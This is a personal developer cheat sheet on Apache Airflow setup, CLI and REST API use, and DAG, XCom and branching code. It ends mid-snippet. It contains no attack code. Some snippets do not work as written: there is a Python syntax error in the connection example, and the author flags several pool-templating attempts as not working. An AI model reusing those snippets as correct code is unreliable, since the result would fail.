Cheat sheets on a range of topics

cheat sheet

other cheat sheets:

other cheat-tools

useful tools:

useful search function for searching the whole cheat sheet

function cheat-grep(){
    if [[ $1 == "" ]]; then
        echo "nothing to search"
        return;
    fi

    search_line=""
    for each_input_arg in "$@"; do
        if [[ $search_line == "" ]]; then
            search_line=$each_input_arg
        else
            search_line=$search_line".*"$each_input_arg
        fi
    done

    grep -r -i -A 2 "$search_line" $HOME_PROJECTS/cheat-sheet/*.md $HOME_PROJECTS/bash-example/*
}

collaboration whiteboard drawing

tools for developers on localhost

  • sdkman

    switch SDKs of your favorite language quickly
    show additional info in your console prompt

  • flox

    create virtual environment with dependencies

editor

render/run html/js/javascript files from github

githack.com

  • Development https://raw.githack.com/[user]/[repository]/[branch]/[filename.ext]
  • Production (CDN) https://rawcdn.githack.com/[user]/[repository]/[branch]/[filename.ext] example: https://raw.githack.com/cherkavi/javascripting/master/d3/d3-bar-chart.html

github.io

http://htmlpreview.github.io/?[full path to html page] example http://htmlpreview.github.io/?https://github.com/cherkavi/javascripting/blob/master/d3/d3-bar-chart.html
http://htmlpreview.github.io/?https://github.com/twbs/bootstrap/blob/gh-pages/2.3.2/index.html

rawgit

https://rawgit.com/[user]/[repository]/master/index.html https://rawgit.com/cherkavi/javascripting/master/d3/d3-bar-chart.html

diagram drawing

markdown

regular expressions

stream editor

online coding

code analyser

code changer

database GUI client

database cli clients, sql cli tools, db connect from command line

https://java-source.net/open-source/sql-clients

  • https://hsqldb.org doc download

  • sqlshell download

  • henplus

  • sqlline sqlline doc installation from source

    git clone https://github.com/julianhyde/sqlline.git
    cd sqlline
    git tag
    git checkout sqlline-1.12.0
    mvn package  

    download from maven

    ver=1.12.0
    wget https://repo1.maven.org/maven2/sqlline/sqlline/$ver/sqlline-$ver-jar-with-dependencies.jar

    usage

    java -cp "*" sqlline.SqlLine \
      -n myusername \
      -p supersecretpassword \
      -u "jdbc:oracle:thin:@my.host.name:1521:my-sid"

    usage with db2

    JDBC_SERVER_NAME=cat.zur
    JDBC_DATABASE=TOM_CAT
    JDBC_PORT=8355
    JDBC_USER=jerry
    JDBC_PASSWORD_PLAIN=mousejerry
    JDBC_DRIVER='com.ibm.db2.jcc.DB2Driver'
    java -cp "*" sqlline.SqlLine -n ${JDBC_USER} -p ${JDBC_PASSWORD_PLAIN} -u "jdbc:db2://${JDBC_SERVER_NAME}:${JDBC_PORT}/${JDBC_DATABASE}" -d $JDBC_DRIVER

password storage

text/password exchange

Software test containers/emulators for development

REST api test frameworks

Collection of AI tools

my own AI cheat sheet :TODO: vector database
:TODO: https://github.com/explodinggradients/ragas

AI platforms

chat bots

general purposes tools

Large Language Model ( LLM )

  • Ollama Facebook

RAG

  • Agentic RAG - for creating scalable workflow of tasks
  • Enhancement tools:
    • LangGraph
    • Phoenix Arize
  • G-RAG

Find out

  • Text2SQL
  • Quantization
  • Reranker
  • Table Augmented Generation

Airflow cheat sheet

Airflow alternatives

Key concepts

official documentation of key concepts

  • DAG a graph object representing your data pipeline ( collection of tasks ).
    Should be:
    • idempotent ( can be executed many times without side effects )
    • can be retried automatically
    • toggle should be "turned on" on UI for execution
  • Operator describes a single task in your data pipeline
    • action - perform actions ( airflow.operators.BashOperator, airflow.operators.PythonOperator, airflow.operators.EmailOperator... )
    • transfer - move data from one system to another ( SftpOperator, S3FileTransformOperator, MySqlOperator, SqliteOperator, PostgresOperator, MsSqlOperator, OracleOperator, JdbcOperator, airflow.operators.HiveOperator.... ) ( don't use it for BigData - source->executor machine->destination )
    • sensor - waits for data to arrive at a predefined location ( airflow.contrib.sensors.file_sensor.FileSensor ); has a poke method that is called repeatedly until it returns True ( see the sensor sketch after this list )
  • Task An instance of an operator
  • Task Instance Represents a specific run of a task = DAG + Task + Point of time
  • Workflow Combination of Dags, Operators, Tasks, TaskInstances
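
a minimal custom sensor sketch ( assumes a recent Airflow 2.x; class name and checked path are made up for illustration ) - poke() is called again and again, with poke_interval pauses, until it returns True:

import os
from airflow.sensors.base import BaseSensorOperator

class LocalFileSensor(BaseSensorOperator):
    def __init__(self, filepath: str, **kwargs):
        super().__init__(**kwargs)
        self.filepath = filepath

    def poke(self, context) -> bool:
        # called repeatedly until True is returned ( or the sensor times out )
        self.log.info("checking %s", self.filepath)
        return os.path.exists(self.filepath)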

configuration, settings

AIRFLOW_CONFIG - environment variable with the path to airflow.cfg

  • executor/airflow.cfg

    • remove examples from UI (restart) load_examples = False
    • how often new DAGs should be picked up from the filesystem ( dag update, python file update ): min_file_process_interval = 0 dag_dir_list_interval = 60
    • authentication ( important for REST api 1.x.x )
      • auth_backend = airflow.api.auth.backend.basic_auth
        AIRFLOW__API__AUTH_BACKEND=airflow.api.auth.backend.basic_auth # for version 2.0.+
      • auth_backend = airflow.api.auth.backend.default
  • variables

     from airflow.models import Variable
     my_var = Variable.set("my_key", "my_value")
  • connections as variables

     from airflow.hooks.base_hook import BaseHook
     my_connection = BaseHook.get_connection("name_of_connection")
     login = my_connection.login
     pass = my_connection.password
  • templating

     {{ var.value.<variable_key> }}
    

Remember, don’t put any get/set of variables outside of tasks.
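
a minimal sketch ( the variable key and callable name are placeholders ): read the Variable inside the callable so the metadata DB is hit only at run time, not on every DAG-file parse:

from airflow.models import Variable

def my_task_callable(**context):
    # resolved when the task runs, not when the scheduler parses the DAG file
    my_value = Variable.get("my_key", default_var="fallback")
    print(my_value)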

Architecture overview

single node multi node statuses to scheduled: https://github.com/apache/airflow/blob/866a601b76e219b3c043e1dbbc8fb22300866351/airflow/jobs/scheduler_job.py#L810
from scheduled: https://github.com/apache/airflow/blob/866a601b76e219b3c043e1dbbc8fb22300866351/airflow/jobs/scheduler_job.py#L329
to queued:https://github.com/apache/airflow/blob/866a601b76e219b3c043e1dbbc8fb22300866351/airflow/jobs/scheduler_job.py#L483

task lifecycle

components

  • WebServer
    • read user request
    • UI
  • Scheduler
    • scans the folder "%AIRFLOW%/dags" ( config:dags_folder ) with a timeout ( config:dag_dir_list_interval )
    • monitors execution: "start_date" ( + "schedule_interval", first run with start_date ), writes "execution_date" ( last time executed )
    • create DagRun ( instance of DAG ) and fill DagBag ( with interval config:worker_refresh_interval )
      • start_date ( start_date must be in past, start_date+schedule_interval must be in future )
      • end_date
      • retries
      • retry_delay
      • schedule_interval (cron:str / datetime.timedelta) ( cron presets: @once, @hourly, @daily, @weekly, @monthly, @yearly )
      • catchup ( config:catchup_by_default ) or "BackFill" ( fill previous executions from start_date ); applies to the scheduler only ( backfill is also possible via the command line )
      airflow dags backfill -s 2021-04-01 -e 2021-04-05 --reset_dagruns my_dag_name
      • print snapshot of task state tracked by executor
      pkill -f -USR2 "airflow scheduler"
      
  • Executor ( How task will be executed, how it will be queued )
    • type: LocalExecutor(multiple task in parallel), SequentialExecutor, CeleryExecutor, DaskExecutor
  • Worker ( Where task will be executed )
  • Metadatabase ( task status )
    • types
    • configuration:
      • sql_alchemy_conn
      • sql_alchemy_pool_enabled

installation

# create python virtual env
python3 -m venv airflow-env
source airflow-env/bin/activate

# create folder 
mkdir airflow
export AIRFLOW_HOME=`pwd`/airflow

# install workflow
AIRFLOW_VERSION=2.0.2
PYTHON_VERSION=3.8

pip install apache-airflow==$AIRFLOW_VERSION \
 --constraint "https://raw.githubusercontent.com/apache/airflow/constraints-$AIRFLOW_VERSION/constraints-$PYTHON_VERSION.txt"
 # necessary !!!
 exit 

generate configuration file

airflow

change configuration file

dags_folder = /home/ubuntu/airflow/dags
sql_alchemy_conn = postgresql+psycopg2://airflow:[email protected]:5432/airflow
load_examples=False
dag_dir_list_interval = 30
catchup_by_default = False
auth_backend = airflow.api.auth.backend.basic_auth
expose_config = True
dag_run_conf_overrides_params=True

# hide all Rendered Templates
show_templated_fields=none

[webserver]
instance_name = "title name of web ui"

Airflow start on python, naked start, start components, start separate components, start locally, manual start

# installed package
/home/ubuntu/.local/lib/python3.8/site-packages
# full path to airflow
/home/ubuntu/.local/bin/airflow

# init workflow
airflow db init   # "airflow initdb" in 1.x
# create user first login
airflow users  create --role Admin --username vitalii --email [email protected] --firstname Vitalii --lastname Cherkashyn --password my_secure_password

# airflow db reset - to reset all data
airflow scheduler &
airflow webserver -p 8080 &
echo "localhost:8080"

# check logs
airflow serve_logs

# sudo apt install sqlite3
# sqlite3 $AIRFLOW_HOME/airflow.db

airflow start

export AIRFLOW_HOME=/home/ubuntu/airflow
export PATH=$PATH:/home/ubuntu/.local/bin
export AIRFLOW__WEBSERVER__INSTANCE_NAME="test-account-01"

nohup airflow webserver -p 8080 --pid $AIRFLOW_HOME/airflow-webserver.pid > $AIRFLOW_HOME/airflow-webserver.log 2>&1 &
nohup airflow scheduler --pid $AIRFLOW_HOME/airflow-scheduler.pid > $AIRFLOW_HOME/airflow-scheduler.log 2>&1 &
nohup airflow celery flower -p 8081  > $AIRFLOW_HOME/airflow-celery-flower.log 2>&1 &

airflow status

ps aux | grep airflow | grep webserver | awk '{print $14}' | grep webserver
ps aux | grep airflow | grep scheduler | awk '{print $15}'
ps aux | grep airflow | grep flower | awk '{print $14}'

airflow stop

ps aux | grep airflow | grep webserver | awk '{print $2}' | xargs -I{} kill -15 {} || echo "webserver removed"
rm $AIRFLOW_HOME/airflow-webserver.pid || echo "not exists"

ps aux | grep airflow | grep scheduler | awk '{print $2}' | xargs -I{} kill -15 {} || echo "scheduler removed"
rm $AIRFLOW_HOME/airflow-scheduler.pid || echo "not exists"

ps aux | grep airflow | grep flower | awk '{print $2}' | xargs -I{} kill -15 {} || echo "flower removed"

airflow reset

# remove dags
rm -rf /home/ubuntu/airflow/dags/*

# remove logs
rm -rf /home/ubuntu/airflow/logs/dag_processor_manager/*
rm -rf /home/ubuntu/airflow/logs/scheduler/*
rm -rf /home/ubuntu/airflow/logs/shopify_collections_create/*
rm -rf /home/ubuntu/airflow/logs/shopify_image_add_product/*
rm -rf /home/ubuntu/airflow/logs/shopify_image_set_variant/*
rm -rf /home/ubuntu/airflow/logs/shopify_product_create/*
rm -rf /home/ubuntu/airflow/logs/shopify_product_delete/*
rm -rf /home/ubuntu/airflow/logs/shopify_product_update/*

# clean up DB !!!
airflow db reset
# !!! all variables after reset should be created again manually 

astro cli

astro dev init
astro dev start
astro dev ps
astro dev stop
# * copy your dags to ``` .dags```
docker-compose -f docker-compose-LocalExecutor.yml up -d
conda env create -f environment.yml
source activate airflow-tutorial

credentials

ssh -p 2200 airflow@localhost
# passw: airflow

activate workspace

source .sandbox/bin/activate

update

  1. backup DB
  2. check your DAGs for deprecations
  3. upgrade airflow
    pip install "apache-airflow==2.0.1" --constraint constraint-file
  4. upgrade DB
    airflow db upgrade
  5. restart all

commands

check workspace

airflow --help

operator types ( BaseOperator )

  • action
  • transfer ( data )
  • sensor ( waiting for some event )
    • long running task
    • BaseSensorOperator
    • poke method is responsible for waiting

Access to DB

!!! create env variables for securing connection

Admin -> Connections -> postgres_default  
# adjust login, password
Data Profiling->Ad Hoc Query-> postgres_default  
select * from dag_run;

via PostgreConnection

    clear_xcom = PostgresOperator(
        task_id='clear_xcom',
        provide_context=True,
        postgres_conn_id='airflow-postgres',
        trigger_rule="all_done",
        sql="delete from xcom where dag_id LIKE 'my_dag%'",
        dag=dag)

configuration must have "api.auth_backend", for example:

[api]
auth_backend = airflow.api.auth.backend.default  

read DAG runs

AIRFLOW_URL=https://airflow.local
DAG_NAME=xsd_generation
AIRFLOW_ENDPOINT=$AIRFLOW_URL/api/experimental/dags/$DAG_NAME/dag_runs

curl -X GET -u $USER_AIRFLOW:$PASSWORD_AIRFLOW $AIRFLOW_ENDPOINT

trigger DAG - python

# python 3 version ( the original used python 2 urllib2 ) against the experimental REST API
import json
import urllib.request

AIRFLOW_URL = "https://airflow.local/api/experimental/dags/name_of_my_dag/dag_runs"
payload_dict = {"conf": {"dag_param_1": "test value"}}

req = urllib.request.Request(
    AIRFLOW_URL,
    data=json.dumps(payload_dict).encode("utf-8"),
    headers={"Content-Type": "application/json", "Cache-Control": "no-cache"},
    method="POST",
)
with urllib.request.urlopen(req) as f:
    print(f.read().decode())

curl request

ENDPOINT="$AIRFLOW_URL/api/v1/dags/notification_send/dagRuns"
BODY='{"conf":{"account_id":"xxx","message_type":"error","message_text":"test_curl"}}'
curl --header "Content-Type: application/json" --data-binary $BODY -u $AIRFLOW_USER:$AIRFLOW_PASSWORD -X POST $ENDPOINT
AIRFLOW_ENDPOINT="https://airflow.local/api/experimental"
AIRFLOW_USER=my_user
AIRFLOW_PASSWORD=my_passw

Airflow REST API request

function airflow-event-delete(){
	if [ -z "$1" ]
	then
	   echo "first argument should have filename"
	   return 1
	fi
	
	DAG_NAME="shopify_product_delete"
	DAG_RUN_ID="manual_shopify_product_delete_"`date +%Y-%m-%d-%H:%M:%S:%s`
	ENDPOINT="$AIRFLOW_URL/api/v1/dags/$DAG_NAME/dagRuns"
	BODY="{\"conf\":{\"account_id\":\"$ACCOUNT_ID\",\"filename\":\"$1\"},\"dag_run_id\":\"$DAG_RUN_ID\"}"
	echo $BODY
	curl -H "Content-Type: application/json" --data-binary "$BODY" -u $AIRFLOW_USER:$AIRFLOW_PASSWORD -X POST $ENDPOINT
}

airflow dag code

from typing import Dict

class ListComparatorRequest:
    def __init__(self, dag_run_config: Dict):
        self.account_id: str = dag_run_config["account_id"]
        self.filename: str = dag_run_config["filename"]

    def request_object(self) -> Dict:
        return {
            "account_id": self.account_id,
            "filename": self.filename,
        }

    def __str__(self) -> str:
        return f"account_id:{self.account_id} filename:{self.filename}"
	
request: ListComparatorRequest = ListComparatorRequest(context["dag_run"].conf)

airflow test connection

curl -u $AIRFLOW_USER:$AIRFLOW_PASSWORD -X GET "$ENDPOINT/test"

airflow scrape html, airflow download logs, airflow log parsing, airflow log downloader

AIRFLOW_URL="https://airflow.vantage.com"
# target task list url 
AIRFLOW_TASK_LIST="$AIRFLOW_URL/taskinstance/list/?_flt_0_task_id=my_task&_flt_0_state=failed&_oc_TaskInstanceModelView=execution_date&_od_TaskInstanceModelView=desc"
AIRFLOW_HEADER='Cookie: iamlbcookie=01; AMProd=*AAJTSQACM...'
curl "$AIRFLOW_TASK_LIST" -H "$AIRFLOW_HEADER" > out.html
# change /log?-> /get_logs_with_metadata?
# add to the end: &try_number=1&metadata=null
for each_log_url in `cat out.html | hq '//table/tr/td[17]/a/@href' | awk -F 'href=' '{print $2}' | sed 's/\/log\?/\/get_logs_with_metadata/g' | sed -r 's/[\"\,]+//g' | awk '{print $1"&try_number=1&metadata=null"}'`; do
    file_name=`echo $each_log_url | awk -F '[=&]' '{print $2}'`
    curl $each_log_url -H "$AIRFLOW_HEADER" > $file_name
done

airflow cli commandline console command

https://airflow.apache.org/docs/apache-airflow/stable/usage-cli.html

# activation
register-python-argcomplete airflow >> ~/.bashrc
# dag list
airflow list_dags
airflow list_tasks dag_id
airflow trigger_dag my-dag
# triggering
# https://airflow.apache.org/docs/apache-airflow/1.10.2/cli.html
airflow trigger_dag -c ""  dag_id

airflow create dag start dag run dag

doc; run in case of removing a dag ( delete dag ) - all metadata will be removed from the database

# !!! no spaces in request body !!!
REQUEST_BODY='{"conf":{"session_id":"bff2-08275862a9b0"}}'

# ec2-5-221-68-13.compute-1.amazonaws.com:8080/api/v1/dags/test_dag/dagRuns
curl --data-binary $REQUEST_BODY -H "Content-Type: application/json" -u $AIRFLOW_USER:$AIRFLOW_PASSWORD -X POST $AIRFLOW_URL"/api/v1/dags/$DAG_ID/dagRuns"
# run dag from command line

REQUEST_BODY='{"conf":{"sku":"bff2-08275862a9b0","pool_for_execution":"test_pool2"}}'
DAG_ID="test_dag2"

airflow dags trigger -c $REQUEST_BODY  $DAG_ID

airflow re-run tasks, airflow clear task status

START_TIME=2023-02-07T09:03:16.827376+00:00
END_TIME=2023-02-07T09:06:38.279548+00:00
airflow clear $DAG_NAME -t $TASK_NAME -s $START_TIME -e $END_TIME

airflow check dag execution

curl -X GET -u $AIRFLOW_USER:$AIRFLOW_PASSWORD "$AIRFLOW_ENDPOINT/dags/$DAG_ID/dagRuns" | jq '.[] | if .state=="running" then . else empty end'

airflow get dag task

curl -u $AIRFLOW_USER:$AIRFLOW_PASSWORD -X GET $AIRFLOW_ENDPOINT"/dags/$DAG_ID/dag_runs/$DATE_DAG_EXEC/tasks/$TASK_ID"

airflow get task url

curl -u $AIRFLOW_USER:$AIRFLOW_PASSWORD -X GET "$AIRFLOW_ENDPOINT/task?dag_id=$DAG_ID&task_id=$TASK_ID&execution_date=$DATE_DAG_EXEC"

airflow get all dag-runs, get list of dag-runs

BODY='{"dag_ids":["shopify_product_create"],"page_limit":30000}'
curl -X POST "$AIRFLOW_URL/api/v1/dags/~/dagRuns/list" -H "Content-Type: application/json" --data-binary $BODY --user "$AIRFLOW_USER:$AIRFLOW_PASSWORD" > dag-runs.json
curl -X GET "$AIRFLOW_URL/api/v1/dags/shopify_product_create/dagRuns" -H "Content-Type: application/json" --data-binary $BODY --user "$AIRFLOW_USER:$AIRFLOW_PASSWORD"

DAG_NAME=shopify_product_create
curl -X GET -u $AIRFLOW_USER:$AIRFLOW_PASSWORD "$AIRFLOW_ENDPOINT/dags/$DAG_NAME/dag_runs"

batch retrieve

BODY='{"dag_ids":["shopify_product_create"]}'
curl -X POST "$AIRFLOW_URL/api/v1/dags/~/dagRuns/list" -H "Content-Type: application/json" --data-binary $BODY --user "$AIRFLOW_USER:$AIRFLOW_PASSWORD" 

DAG_ID=shopify_product_create
TASK_ID=product_create
DAG_RUN_ID=shopify_product_create_2021-06-15T18:59:35.1623783575Z_6062835
alias get_airflow_log='curl -X GET --user "$AIRFLOW_USER:$AIRFLOW_PASSWORD" $AIRFLOW_URL/api/v1/dags/$DAG_ID/dagRuns/$DAG_RUN_ID/taskInstances/$TASK_ID/logs/1'

get list of tasks

BODY='{"dag_ids":["shopify_product_create"],"state":["failed"]}'
curl -X POST "$AIRFLOW_URL/api/v1/dags/~/dagRuns/~/taskInstances/list" -H "Content-Type: application/json" --data-binary $BODY --user "$AIRFLOW_USER:$AIRFLOW_PASSWORD" 

create variable

BODY="{\"key\":\"AWS_ACCESS_KEY_ID\",\"value\":\"${AWS_ACCESS_KEY_ID}\"}"
curl --data-binary $BODY -H  "Content-Type: application/json" --user "$AIRFLOW_USER:$AIRFLOW_PASSWORD" -X POST $CREATE_VAR_ENDPOINT

create pool

curl -X POST "$AIRFLOW_URL/api/v1/pools" -H "Content-Type: application/json" --data '{"name":"product","slots":18}' --user "$AIRFLOW_USER:$AIRFLOW_PASSWORD"

configuration

rewrite configuration with environment variables

example of overwriting configuration from config file by env-variables

# airflow.cfg
[core]
airflow_home = /path/to/airflow
dags_folder = /path/to/dags

# environment variables ( AIRFLOW__<SECTION>__<KEY> ) override the values from the file
AIRFLOW__CORE__DAGS_FOLDER='/path/to/new-dags-folder'
AIRFLOW__CORE__AIRFLOW_HOME='/path/to/new-version-of-airflow'

how to speedup airflow core.parallelism

# * maximum number of tasks running across an entire Airflow installation
# * number of physical python processes the scheduler can run, i.e. tasks ( processes ) that run in parallel
# scope: Airflow
core.parallelism

dag concurrency

# * max number of tasks that can be running per DAG (across multiple DAG runs)
# * number of task instances that run simultaneously per DagRun ( amount of TaskInstances inside one DagRun )
# scope: DAG.task
core.dag_concurrency

max active runs per dag

# * maximum number of active DAG runs, per DAG
# * number of DagRuns that run concurrently; don't raise it if dag-runs depend on each other
# scope: DAG.instance
core.max_active_runs_per_dag
# Only allow one run of this DAG to be running at any given time, default value = core.max_active_runs_per_dag
dag = DAG('my_dag_id', max_active_runs=1)

task concurrency

# Allow a maximum of 10 tasks to be running across a max of 2 active DAG runs
dag = DAG('example2', concurrency=10, max_active_runs=2)
# !!! pool: the pool to execute the task in. Pools can be used to limit parallelism for only a subset of tasks
core.non_pooled_task_slot_count: number of task slots allocated to tasks not running in a pool
scheduler.max_threads: how many threads the scheduler process should use to schedule DAGs
celery.worker_concurrency: max number of task instances that a worker will process at a time if using CeleryExecutor
celery.sync_parallelism: number of processes CeleryExecutor should use to sync task state

different configuration of executor

LocalExecutor with PostgreSQL

executor = LocalExecutor
sql_alchemy_conn = postgresql+psycopg2://airflow@localhost:5432/airflow_metadata

CeleryExecutor with PostgreSQL and RabbitMQ ( recommended for prod )

settings

executor = CeleryExecutor
sql_alchemy_conn = postgresql+psycopg2://airflow@localhost:5432/airflow_metadata
# RabbitMQ UI: localhost:15672
broker_url = pyamqp://admin:rabbitmq@localhost/
result_backend = db+postgresql://airflow@localhost:5432/airflow_metadata
worker_log_server_port = 8899

start Celery worker node

# just a start worker process
airflow worker
# start with two child worker processes - the same as 'worker_concurrency' in airflow.cfg
airflow worker -c 2
# default pool name: default_pool, default queue name: default 
airflow celery worker --queues default

normal celery worker output log

[2021-07-11 08:23:46,260: INFO/MainProcess] Connected to amqp://dskcfg:**@toad.rmq.cloudamqp.com:5672/dskcf
[2021-07-11 08:23:46,272: INFO/MainProcess] mingle: searching for neighbors
[2021-07-11 08:23:47,304: INFO/MainProcess] mingle: sync with 1 nodes
[2021-07-11 08:23:47,305: INFO/MainProcess] mingle: sync complete
[2021-07-11 08:23:47,344: INFO/MainProcess] celery@airflow-01-worker-01 ready.

** in case of adding/removing Celery Workers - restart Airflow Flower **

DAG

task dependencies in DAG

# Task1 -> Task2 -> Task3
t1.set_downstream(t2);t2.set_downstream(t3)
t1 >> t2 >> t3

t3.set_upstream(t2);t2.set_upstream(t1)
t3 << t2 << t1

from airflow.models.baseoperator import chain, cross_downstream
chain(t1,t2,t3)
cross_downstream([t1,t2], [t3,t4])

# or set multiple dependencies
upstream_tasks = t3.upstream_list
upstream_tasks.append(t2)
upstream_tasks.append(t1)
upstream_tasks >> t3

task information, task metainformation, task context, exchange

def python_operator_core_func(**context):
   print(context['task_instance'])
   context["dag_run"].conf['dag_run_argument']
   # the same as previous
   # manipulate with the task-instance inside the custom function, context inside the custom function
   # context['ti'].xcom_push(key="k1", value="v1")
   context.get("ti").xcom_push(key="k1", value="v1")

   # and after that pull it and read the first value
   # context.get("ti").xcom_pull(task_ids="name_of_task_with_push")[0]
   # context.get("ti").xcom_pull(task_ids=["name_of_task_with_push", "name_another_task_to_push"])[0]
   return "value for saving in xcom" # key - return_value
...
PythonOperator(task_id="python_example", python_callable=python_operator_core_func, provide_context=True, do_xcom_push=True )

task context without context, task jinja template, jinja macros

magic numbers for jinja template

def out_of_context_function():
   return_value = ("{{ ti.xcom_pull(task_ids='name_of_task_with_push')[0] }}")

retrieve all values from XCOM

from datetime import datetime
from airflow import DAG
from airflow.operators.python_operator import PythonOperator
from airflow.utils.timezone import make_aware
from airflow.models import XCom

def pull_xcom_call(**kwargs):
    # if you need only TaskInstance: pull_xcom_call(ti)
    # !!! hard-coded value 
    execution_date = make_aware(datetime(2020, 7, 24, 23, 45, 17, 00))
    xcom_values = XCom.get_many(dag_ids=["data_pipeline"], include_prior_dates=True, execution_date=execution_date)
    print('XCom.get_many >>>', xcom_values)
    
    get_xcom_with_ti = kwargs['ti'].xcom_pull(dag_id="data_pipeline", include_prior_dates=True)
    print('ti.xcom_pull with include_prior_dates >>>', get_xcom_with_ti)


xcom_pull_task = PythonOperator(
    task_id='xcom_pull_task',
    dag=dag, # here need to set DAG 
    python_callable=pull_xcom_call,
    provide_context=True
)

sub-dags

from airflow.operators.subdag_operator import SubDagOperator
...
subdag_task = SubDagOperator(subdag=DAG(SUBDAG_PARENT_NAME+"."+SUBDAG_NAME,schedule_interval=parent_dag.schedule_interval, start_date=parent_dag.start_date,catchup=False))
...

test task

airflow tasks test my_dag_name my_task_name 2021-04-01

collaboration with external sources via "connections"
Hooks act as an interface to communicate with the external shared resources in a DAG.
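
a minimal hook sketch ( assumes the apache-airflow-providers-postgres package and a connection named "airflow-postgres" under Admin -> Connections ); the hook resolves host/login/password from the connection instead of hard-coding credentials:

from airflow.providers.postgres.hooks.postgres import PostgresHook

def count_dag_runs(**context):
    hook = PostgresHook(postgres_conn_id="airflow-postgres")
    rows = hook.get_records("select state, count(*) from dag_run group by state")
    for state, cnt in rows:
        print(state, cnt)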

XCOM, Cross-communication

GUI: Admin -> Xcoms
Should be manually cleaned up
Exchanges information between multiple tasks - "cross communication".

Objects must be serializable
Some operators ( BashOperator, SimpleHttpOperator, ... ) have the parameter xcom_push=True - the last std.output/http.response will be pushed
Some operators ( PythonOperator ) can "return" a value from the function ( defined in the operator ) - it is automatically pushed to XCOM
Saved in the Metadatabase together with additional data: "execution_date", "task_id", "dag_id"
"execution_date" means older entries ( same task_id, dag_id... ) before this date are hidden ( skipped )

xcom_push(key="name_of_value", value="some value")
xcom_pull(task_ids="name_of_task_with_push")
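
a minimal push/pull sketch ( assumes Airflow 2.x and an existing dag object; task ids are placeholders ):

from airflow.operators.python import PythonOperator

def push_value(**context):
    context["ti"].xcom_push(key="name_of_value", value="some value")

def pull_value(**context):
    # pull by the id of the task that pushed
    print(context["ti"].xcom_pull(task_ids="push_task", key="name_of_value"))

push_task = PythonOperator(task_id="push_task", python_callable=push_value, dag=dag)
pull_task = PythonOperator(task_id="pull_task", python_callable=pull_value, dag=dag)
push_task >> pull_task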

task state

if ti.state not in ["success", "failed", "running"]:
    return None

branching, select next step, evaluate next task, condition

!!! don't use "depends_on_past"

def check_for_activated_source():
  # return name ( str ) of the task
  return "mysql_task"

branch_task = BranchPythonOperator(task_id='branch_task', python_callable=check_for_activated_source)
mysql_task 	= BashOperator(task_id='mysql_task', bash_command='echo "MYSQL is activated"')
postgresql_task = BashOperator(task_id='postgresql_task', bash_command='echo "PostgreSQL is activated"')
mongo_task 	= BashOperator(task_id='mongo_task', bash_command='echo "Mongo is activated"')

branch_task >> mysql_task
branch_task >> postgresql_task
branch_task >> mongo_task
# branch_task >> [mongo_task, mysql_task, postgresql_task]

branching with avoiding unexpected run, fix branching

from airflow.operators.python_operator import PythonOperator
from airflow.models.skipmixin import SkipMixin

def fork_label_determinator(**context):
    decision = context['dag_run'].conf.get('branch', 'default')
    return "run_task_1"

all_tasks = set([task1, task2, task3])

class SelectOperator(PythonOperator, SkipMixin):
    def execute(self, context):
        condition = super().execute(context)
        self.log.info(">>> Condition %s", condition)
        if condition == "run_task_1":
            self.skip(context['dag_run'], context['ti'].execution_date, list(all_tasks - set([task1])))
            return

# BranchPythonOperator was not working properly - applied workaround
# fork_label = BranchPythonOperator(
fork_label = SelectOperator(
    task_id=FORK_LABEL_TASK_ID,
    provide_context=True,
    python_callable=fork_label_determinator,
    dag=dag_subdag
)

Trigger rules

Task States:

  • success
  • skipped
  • failed

trigger rules example:

run_this_first >> branching
branching >> branch_a >> follow_branch_a >> join
branching >> branch_false >> join

default trigger rules

join = DummyOperator(task_id='join', dag=dag, trigger_rule='none_failed_or_skipped')

changed rule

Trigger Rules:

  • default: all_success
  • all_failed
  • all_done
  • one_success
  • one_failed
  • none_failed
  • none_skipped
  • none_failed_or_skipped
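
for example, a changed rule on a join task ( a minimal sketch reusing DummyOperator, dag and the branch tasks from the example above ) so it runs as soon as any one branch succeeds:

# runs when at least one direct upstream task has succeeded
join_any = DummyOperator(task_id='join_any', dag=dag, trigger_rule='one_success')
branch_a >> join_any
branch_false >> join_any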

Service Level Agreement, SLA

GUI: Browse->SLA Misses

def log_sla_miss(dag, task_list, blocking_task_list, slas, blocking_tis):
    print("SLA was missed on DAG {0}s by task id {1}s with task list: {2} which are " \
	"blocking task id {3}s with task list: {4}".format(dag.dag_id, slas, task_list, blocking_tis, blocking_task_list))

...

# call back function for missed SLA
with DAG('sla_dag', default_args=default_args, sla_miss_callback=log_sla_miss, schedule_interval="*/1 * * * *", catchup=False) as dag:
    t0 = DummyOperator(task_id='t0')
    t1 = BashOperator(task_id='t1', bash_command='sleep 15', sla=timedelta(seconds=5), retries=0)
    t0 >> t1

should be placed into the "dags" folder ( default: %AIRFLOW_HOME%/dags )

  • minimal dag
from airflow import DAG
from datetime import datetime, timedelta

with DAG('airflow_tutorial_v01', 
         start_date=datetime(2015, 12, 1),
         catchup=False
         ) as dag:
    print(dag)
    # next string will not work !!! only for Task/Operators values !!!!
    print("{{ dag_run.conf.get('sku', 'default_value_for_sku') }}" )
from airflow import DAG
from datetime import datetime, timedelta
from airflow.operators.python import PythonOperator
from airflow.utils.dates import days_ago
from airflow.utils.weight_rule import WeightRule

def print_echo(**context):
    print(context)
    # next string will not work !!! only for Task/Operators values !!!!
    print("{{ dag_run.conf.get('sku', 'default_value_for_sku') }}" )

with DAG('test_dag', 
         start_date=days_ago(100),
         catchup=False,
         schedule_interval=None,
         ) as dag:
    PythonOperator(task_id="print_echo",
                   python_callable=print_echo,
                   provide_context=True,
                   retries=3,
                   retry_delay=timedelta(seconds=30),
                   priority_weight=4,
                   weight_rule=WeightRule.ABSOLUTE, # mandatory for expected priority behavior
                   # dag_run.conf is not working for pool !!!
                   pool="{{ dag_run.conf.get('pool_for_execution', 'default_pool') }}",
                   # retries=3,
                   # retry_delay=timedelta(seconds=30),
                   doc_md="this is doc for task")
# still not working !!!! impossible to select pool via parameters
from airflow import DAG
from airflow.operators.bash_operator import BashOperator
from airflow.utils.dates import days_ago

dag = DAG("test_dag2", schedule_interval=None, start_date=days_ago(2))
dag_pool="{{ dag_run.conf['pool_for_execution'] }}"
print(dag_pool)
parameterized_task = BashOperator(
    task_id='parameterized_task',
    queue='collections',
    pool=f"{dag_pool}",
    bash_command=f"echo  {dag_pool}",
    dag=dag,
)
print(f">>> {parameterized_task}")
	DEFAULT_ARGS = {
    'owner': 'airflow',
    'depends_on_past': True,
    'start_date': datetime(2015, 12, 1),
    'email_on_failure': False,
    'email_on_retry': False,
    # 'retries': 3,
    # 'retry_delay': timedelta(seconds=30),
}

with DAG(DAG_NAME,
         start_date=datetime(2015, 12, 1),
         catchup=False,
         # catchup=True,
         schedule_interval=None,
         max_active_runs=1,
